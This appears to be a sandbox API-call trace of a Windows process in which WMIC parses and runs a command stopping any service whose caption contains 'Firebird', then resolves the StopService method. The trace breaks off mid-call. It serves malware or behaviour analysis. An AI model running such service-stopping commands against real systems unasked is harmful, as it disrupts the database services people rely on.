SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0099.348] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.348] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0099.348] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.348] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0099.349] FreeThreadedDOMDocument:IUnknown:Release (This=0x58a45a8) returned 0x0 [0099.349] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE" [0099.349] memcpy_s (in: _Destination=0x11a8040, _DestinationSize=0x8e, _Source=0xdb1588, _SourceSize=0x80 | out: _Destination=0x11a8040) returned 0x0 [0099.350] GetLocalTime (in: lpSystemTime=0xccfc54 | out: lpSystemTime=0xccfc54*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x8, wSecond=0x34, wMilliseconds=0xd2)) [0099.350] _vsnwprintf (in: _Buffer=0x11a80d8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xccfc34 | out: _Buffer="04-15-2018T10:08:52") returned 19 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString="SERVICE") returned 7 [0099.350] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString="WHERE") returned 5 [0099.350] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0099.350] memmove_s (in: _Destination=0x11a2c78, _DestinationSize=0x4, _Source=0x11a2c68, _SourceSize=0x4 | out: _Destination=0x11a2c78) returned 0x0 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString="'caption LIKE '%Firebird%''") returned 27 [0099.350] _wcsicmp (_String1="'caption LIKE '%Firebird%''", _String2="\"NULL\"") returned 5 [0099.350] lstrlenW (lpString="'caption LIKE '%Firebird%''") returned 27 [0099.350] lstrlenW (lpString="'caption LIKE '%Firebird%''") returned 27 [0099.350] memmove_s (in: _Destination=0x11a7d58, _DestinationSize=0x8, _Source=0x11a2c78, _SourceSize=0x8 | out: _Destination=0x11a7d58) returned 0x0 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString="CALL") returned 4 [0099.350] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0099.350] memmove_s (in: _Destination=0x11a8028, _DestinationSize=0xc, _Source=0x11a7d58, _SourceSize=0xc | out: _Destination=0x11a8028) returned 0x0 [0099.350] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE") returned 60 [0099.350] lstrlenW (lpString="STOPSERVICE") returned 11 [0099.351] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0099.351] memmove_s (in: _Destination=0x11a2458, _DestinationSize=0x10, _Source=0x11a8028, _SourceSize=0x10 | out: _Destination=0x11a2458) returned 0x0 [0099.351] lstrlenW (lpString="QUIT") returned 4 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0099.351] lstrlenW (lpString="EXIT") returned 4 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0099.351] WbemLocator:IUnknown:AddRef (This=0xdb6aa8) returned 0x2 [0099.351] lstrlenW (lpString="/") returned 1 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0099.351] lstrlenW (lpString="-") returned 1 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0099.351] lstrlenW (lpString="CLASS") returned 5 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0099.351] lstrlenW (lpString="PATH") returned 4 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0099.351] lstrlenW (lpString="CONTEXT") returned 7 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] lstrlenW (lpString="SERVICE") returned 7 [0099.351] GetCurrentThreadId () returned 0x9cc [0099.351] ??0CHString@@QAE@XZ () returned 0xccfba8 [0099.351] WbemLocator:IWbemLocator:ConnectServer (in: This=0xdb6aa8, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xde0908) returned 0x0 [0100.985] CoSetProxyBlanket (pProxy=0xde0908, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0100.985] ??1CHString@@QAE@XZ () returned 0x74a66430 [0100.985] GetCurrentThreadId () returned 0x9cc [0100.985] ??0CHString@@QAE@XZ () returned 0xccfb50 [0100.985] SysStringLen (param_1="root\\cli") returned 0x8 [0100.985] SysStringLen (param_1="\\") returned 0x1 [0100.985] SysStringLen (param_1="root\\cli\\") returned 0x9 [0100.985] SysStringLen (param_1="ms_409") returned 0x6 [0100.986] WbemLocator:IWbemLocator:ConnectServer (in: This=0xdb6aa8, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xde0cc8) returned 0x0 [0100.998] ??1CHString@@QAE@XZ () returned 0x74a66430 [0100.998] GetCurrentThreadId () returned 0x9cc [0100.998] ??0CHString@@QAE@XZ () returned 0xccfbac [0100.998] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0100.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x11a99a0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0100.999] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0100.999] SysStringLen (param_1="SERVICE") returned 0x7 [0100.999] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0100.999] SysStringLen (param_1="'") returned 0x1 [0100.999] IWbemServices:GetObject (in: This=0xde0908, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xccfba8*=0x0, ppCallResult=0x0 | out: ppObject=0xccfba8*=0xe04788, ppCallResult=0x0) returned 0x0 [0101.020] IWbemClassObject:Get (in: This=0xe04788, wszName="Target", lFlags=0, pVal=0xccfb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.020] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.020] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.020] IWbemClassObject:Get (in: This=0xe04788, wszName="PWhere", lFlags=0, pVal=0xccfb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.020] lstrlenW (lpString="WHERE Name='#'") returned 14 [0101.020] lstrlenW (lpString="WHERE Name='#'") returned 14 [0101.021] IWbemClassObject:Get (in: This=0xe04788, wszName="Connection", lFlags=0, pVal=0xccfb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb80*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe04f50, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] IUnknown:QueryInterface (in: This=0xe04f50, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xccfb9c | out: ppvObject=0xccfb9c*=0xe04f50) returned 0x0 [0101.021] GetCurrentThreadId () returned 0x9cc [0101.021] ??0CHString@@QAE@XZ () returned 0xccfb1c [0101.021] IWbemClassObject:Get (in: This=0xe04f50, wszName="Namespace", lFlags=0, pVal=0xccfb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0101.021] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0101.021] IWbemClassObject:Get (in: This=0xe04f50, wszName="Locale", lFlags=0, pVal=0xccfb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xde709c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] lstrlenW (lpString="ms_409") returned 6 [0101.021] lstrlenW (lpString="ms_409") returned 6 [0101.021] IWbemClassObject:Get (in: This=0xe04f50, wszName="User", lFlags=0, pVal=0xccfb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xde709c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb00*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] IWbemClassObject:Get (in: This=0xe04f50, wszName="Password", lFlags=0, pVal=0xccfb00*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb00*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] IWbemClassObject:Get (in: This=0xe04f50, wszName="Server", lFlags=0, pVal=0xccfb00*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] lstrlenW (lpString=".") returned 1 [0101.021] lstrlenW (lpString=".") returned 1 [0101.021] IWbemClassObject:Get (in: This=0xe04f50, wszName="Authority", lFlags=0, pVal=0xccfb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xde709c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfb00*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.021] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.021] IUnknown:Release (This=0xe04f50) returned 0x1 [0101.022] GetCurrentThreadId () returned 0x9cc [0101.022] ??0CHString@@QAE@XZ () returned 0xccfb0c [0101.022] IWbemClassObject:Get (in: This=0xe04788, wszName="__RELPATH", lFlags=0, pVal=0xccfaf4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfaf4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.022] GetCurrentThreadId () returned 0x9cc [0101.022] ??0CHString@@QAE@XZ () returned 0xccfa88 [0101.022] ??0CHString@@QAE@PBG@Z () returned 0xccfa84 [0101.022] ??0CHString@@QAE@ABV0@@Z () returned 0xccfa04 [0101.022] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0101.022] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x11a99a0 [0101.022] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0101.022] ?Left@CHString@@QBE?AV1@H@Z () returned 0xccf9fc [0101.022] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xccfa00 [0101.022] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xccfa84 [0101.022] ??1CHString@@QAE@XZ () returned 0x1 [0101.022] ??1CHString@@QAE@XZ () returned 0x1 [0101.022] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xccf9f8 [0101.022] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xccfa04 [0101.022] ??1CHString@@QAE@XZ () returned 0x1 [0101.022] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x11a9a00 [0101.022] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0101.022] ?Left@CHString@@QBE?AV1@H@Z () returned 0xccf9fc [0101.022] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xccfa00 [0101.022] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xccfa84 [0101.022] ??1CHString@@QAE@XZ () returned 0x1 [0101.022] ??1CHString@@QAE@XZ () returned 0x1 [0101.022] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xccf9f8 [0101.022] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xccfa04 [0101.022] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.022] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0101.022] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.022] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0101.022] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0101.022] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0101.022] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0101.023] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0101.023] SysStringLen (param_1="\"") returned 0x1 [0101.023] IWbemServices:GetObject (in: This=0xde0cc8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xccfa94*=0x0, ppCallResult=0x0 | out: ppObject=0xccfa94*=0xe05730, ppCallResult=0x0) returned 0x0 [0101.091] IWbemClassObject:Get (in: This=0xe05730, wszName="Text", lFlags=0, pVal=0xccfa60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccfa60*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xdef210*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xde3590, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.091] SafeArrayGetLBound (in: psa=0xdef210, nDim=0x1, plLbound=0xccfa70 | out: plLbound=0xccfa70) returned 0x0 [0101.091] SafeArrayGetUBound (in: psa=0xdef210, nDim=0x1, plUbound=0xccfa74 | out: plUbound=0xccfa74) returned 0x0 [0101.091] SafeArrayGetElement (in: psa=0xdef210, rgIndices=0xccfa8c, pv=0xccfa78 | out: pv=0xccfa78) returned 0x0 [0101.091] SysStringLen (param_1="Service application management. ") returned 0x20 [0101.091] IUnknown:Release (This=0xe05730) returned 0x0 [0101.091] ??1CHString@@QAE@XZ () returned 0x1 [0101.091] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.091] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.091] lstrlenW (lpString="Service application management. ") returned 32 [0101.091] lstrlenW (lpString="Service application management. ") returned 32 [0101.091] IUnknown:Release (This=0xe04788) returned 0x0 [0101.092] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.092] lstrlenW (lpString="PATH") returned 4 [0101.092] lstrlenW (lpString="WHERE") returned 5 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0101.092] lstrlenW (lpString="WHERE") returned 5 [0101.092] lstrlenW (lpString="WHERE") returned 5 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0101.092] lstrlenW (lpString="/") returned 1 [0101.092] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Firebird%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0101.092] lstrlenW (lpString="-") returned 1 [0101.092] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Firebird%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0101.092] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0101.092] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0101.092] lstrlenW (lpString="/") returned 1 [0101.092] lstrlenW (lpString="CALL") returned 4 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0101.092] lstrlenW (lpString="-") returned 1 [0101.092] lstrlenW (lpString="CALL") returned 4 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0101.092] lstrlenW (lpString="CALL") returned 4 [0101.092] lstrlenW (lpString="CALL") returned 4 [0101.092] lstrlenW (lpString="GET") returned 3 [0101.092] lstrlenW (lpString="CALL") returned 4 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0101.092] lstrlenW (lpString="LIST") returned 4 [0101.092] lstrlenW (lpString="CALL") returned 4 [0101.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0101.093] lstrlenW (lpString="SET") returned 3 [0101.093] lstrlenW (lpString="CALL") returned 4 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0101.093] lstrlenW (lpString="CREATE") returned 6 [0101.093] lstrlenW (lpString="CALL") returned 4 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0101.093] lstrlenW (lpString="CALL") returned 4 [0101.093] lstrlenW (lpString="CALL") returned 4 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0101.093] lstrlenW (lpString="/") returned 1 [0101.093] lstrlenW (lpString="STOPSERVICE") returned 11 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0101.093] lstrlenW (lpString="-") returned 1 [0101.093] lstrlenW (lpString="STOPSERVICE") returned 11 [0101.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0101.093] lstrlenW (lpString="STOPSERVICE") returned 11 [0101.093] lstrlenW (lpString="STOPSERVICE") returned 11 [0101.093] GetCurrentThreadId () returned 0x9cc [0101.093] ??0CHString@@QAE@XZ () returned 0xccf314 [0101.093] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0101.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x11a9a30, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0101.093] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0101.093] SysStringLen (param_1="SERVICE") returned 0x7 [0101.093] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0101.093] SysStringLen (param_1="'") returned 0x1 [0101.094] IWbemServices:GetObject (in: This=0xde0908, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xccf2f0*=0x0, ppCallResult=0x0 | out: ppObject=0xccf2f0*=0xe04788, ppCallResult=0x0) returned 0x0 [0101.097] lstrlenW (lpString="CALL") returned 4 [0101.097] lstrlenW (lpString="CALL") returned 4 [0101.097] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0101.097] IWbemClassObject:Get (in: This=0xe04788, wszName="Verbs", lFlags=0, pVal=0xccf2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf2a8*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xdef120*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xdef3e0, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.099] SafeArrayGetLBound (in: psa=0xdef120, nDim=0x1, plLbound=0xccf2b8 | out: plLbound=0xccf2b8) returned 0x0 [0101.099] SafeArrayGetUBound (in: psa=0xdef120, nDim=0x1, plUbound=0xccf2c0 | out: plUbound=0xccf2c0) returned 0x0 [0101.099] SafeArrayGetElement (in: psa=0xdef120, rgIndices=0xccf2c8, pv=0xccf2fc | out: pv=0xccf2fc) returned 0x0 [0101.099] IWbemClassObject:Get (in: This=0xe06958, wszName="Name", lFlags=0, pVal=0xccf298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf298*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.099] lstrlenW (lpString="StartService") returned 12 [0101.099] lstrlenW (lpString="STOPSERVICE") returned 11 [0101.099] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0101.099] IUnknown:Release (This=0xe06958) returned 0x1 [0101.099] SafeArrayGetElement (in: psa=0xdef120, rgIndices=0xccf2c8, pv=0xccf2fc | out: pv=0xccf2fc) returned 0x0 [0101.099] IWbemClassObject:Get (in: This=0xe06e88, wszName="Name", lFlags=0, pVal=0xccf298*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf298*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.099] lstrlenW (lpString="StopService") returned 11 [0101.099] lstrlenW (lpString="STOPSERVICE") returned 11 [0101.099] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0101.099] GetCurrentThreadId () returned 0x9cc [0101.099] ??0CHString@@QAE@XZ () returned 0xccf114 [0101.100] IWbemClassObject:Get (in: This=0xe06e88, wszName="Description", lFlags=0, pVal=0xccf0e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf0e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.100] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.100] IWbemClassObject:Get (in: This=0xe06e88, wszName="Parameters", lFlags=0, pVal=0xccf288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf288*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.100] IWbemClassObject:Get (in: This=0xe06e88, wszName="VerbType", lFlags=0, pVal=0xccf220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.100] IWbemClassObject:Get (in: This=0xe06e88, wszName="Derivation", lFlags=0, pVal=0xccf208*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xccf208*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0101.100] lstrlenW (lpString="StopService") returned 11 [0101.100] lstrlenW (lpString="StopService") returned 11 [0101.100] IUnknown:Release (This=0xe06e88) returned 0x1 [0101.100] IUnknown:Release (This=0xe04788) returned 0x0 [0101.101] ??1CHString@@QAE@XZ () returned 0x74a66430 [0101.101] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.101] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0101.101] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x8d1e8a20 | out: _String="Select", _Context=0x8d1e8a20) returned="Select" [0101.101] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8a20 | out: _String=0x0, _Context=0x8d1e8a20) returned="*" [0101.101] lstrlenW (lpString="FROM") returned 4 [0101.101] lstrlenW (lpString="*") returned 1 [0101.101] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0101.101] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8d1e8a20 | out: _String=0x0, _Context=0x8d1e8a20) returned="from" [0101.101] lstrlenW 